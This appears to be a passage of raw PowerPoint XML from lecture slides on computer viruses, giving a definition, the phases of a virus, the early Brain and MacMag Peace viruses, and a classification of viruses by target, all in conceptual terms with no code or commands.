                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>usin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>untrustworthy </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>code.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="628650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2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Having</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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source</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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c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ode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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helps,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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but does</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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not</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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e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nsure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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you’re safe;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you are </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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trusting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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-5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c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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ompile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-114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r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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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the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operating </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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system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,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etc.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="586105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On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e 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ca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n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i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mprov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e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s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afet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y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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b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y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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auditin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-25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-5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th</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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objec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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-5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code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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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a 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hideousl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y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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time-consumin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g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 process.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>12</a:t>
                      </a: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</a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Compute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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>rus</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1084580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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Program that inserts itself into one or more files and performs some action</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" i="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Insertion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-1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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>phase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-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i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s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insertin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g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itsel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f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int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o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file</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1301750" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-135" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>rigger 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Even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t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o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r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conditio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n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tha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t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initiate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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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th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e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execution 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phase.</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" i="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>phase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-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i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s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performin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g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som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e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(possibl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y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null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)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action</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="6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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Insertion phase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-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700" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>mus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>t </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>be present</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="5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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Nee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d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no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t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alway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s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b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e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executed</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="939165" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Lehig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h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viru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s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inserte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d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itsel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f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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int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o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boo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t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fil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e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onl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y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i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f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boo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t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file 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not infected</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>13</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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8151447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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irus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Phases</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1107440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1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Dormant</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1507490" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1507490" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus is idle</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1507490" lvl="1" indent="-28575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1507490" algn="l"/>
                        </a:tabLst>
                      </a:pP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wil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l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eventuall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y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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be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activate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d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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b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y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som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e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event</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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1507490" lvl="1" indent="-28575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1507490" algn="l"/>
                        </a:tabLst>
                      </a:pP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no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t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al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l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viruse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s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hav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e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thi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s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stage</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3350"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" spc="-100" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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riggering</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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1507490" marR="1369695" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1507490" algn="l"/>
                        </a:tabLst>
                      </a:pP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viru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s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i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s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activate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d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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t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o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perfor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m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th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e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ca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n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b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e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cause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d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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b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y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a variety</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0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system events</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3350"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1507490" marR="1462405" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1507490" algn="l"/>
                          <a:tab pos="4493260" algn="l"/>
                        </a:tabLst>
                      </a:pP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viru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s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place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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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a 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cop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y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o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f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itsel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f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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int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o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othe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r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program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s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or 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certain</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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system areas on	disk</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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1507490" lvl="1" indent="-28575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1507490" algn="l"/>
                        </a:tabLst>
                      </a:pP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ma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y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no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t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b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e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identica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l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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t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o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th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e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propagatin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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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version</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3350"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pP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Execution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:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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payloa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d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functio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n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i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s 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performed.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>14</a:t>
                      </a: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7616094"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>First Reports</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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Brain (Pakistani) virus (1986)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="650"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="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114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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r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itte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n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fo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r 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MS-DOS</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="1125855" lvl="1" indent="-28575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Alters</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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sectors</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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of floppies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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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spreads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to other floppies</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="700"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="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MacMag Peace</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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virus (1987)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="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114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W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r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itte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n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fo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r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 Macintosh</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="915670" lvl="1" indent="-28575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Print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s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“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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universa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-20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-5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messag</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="0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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-25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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-5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 peace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”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o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n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 Marc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h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2, 198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8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an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d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 delete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s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itself</a:t>
                      </a:r>
                      <a:endParaRPr sz="2800" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>15</a:t>
                      </a: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1939290">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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irus Classification by</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-215" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>T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arget</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Boot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sector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infector</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="665480" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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infect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s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a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maste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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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boo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t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recor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d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o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r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boo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t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recor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d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an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d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spreads whe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n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a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syste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m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i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s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boote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d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fro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m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th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e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dis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k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containin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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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th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e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virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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285"/>
                        </a:spcBef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Fil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e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 infector</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="779145" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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infect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s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file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s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tha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t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th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e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operatin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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-2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system</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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or shell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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considers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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to 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b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e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executable</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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285"/>
                        </a:spcBef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2800" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Macro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-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virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="641985" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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infect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s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file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s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wit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h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macr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o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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o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r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scriptin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g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cod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e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tha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t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i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s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interpreted b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y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a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n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application</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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285"/>
                        </a:spcBef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Multipartit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e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virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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295"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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infect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s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file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s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i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n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multipl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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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w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ays</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>16</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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1038860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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Classification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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by</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Concealment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Strategy</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
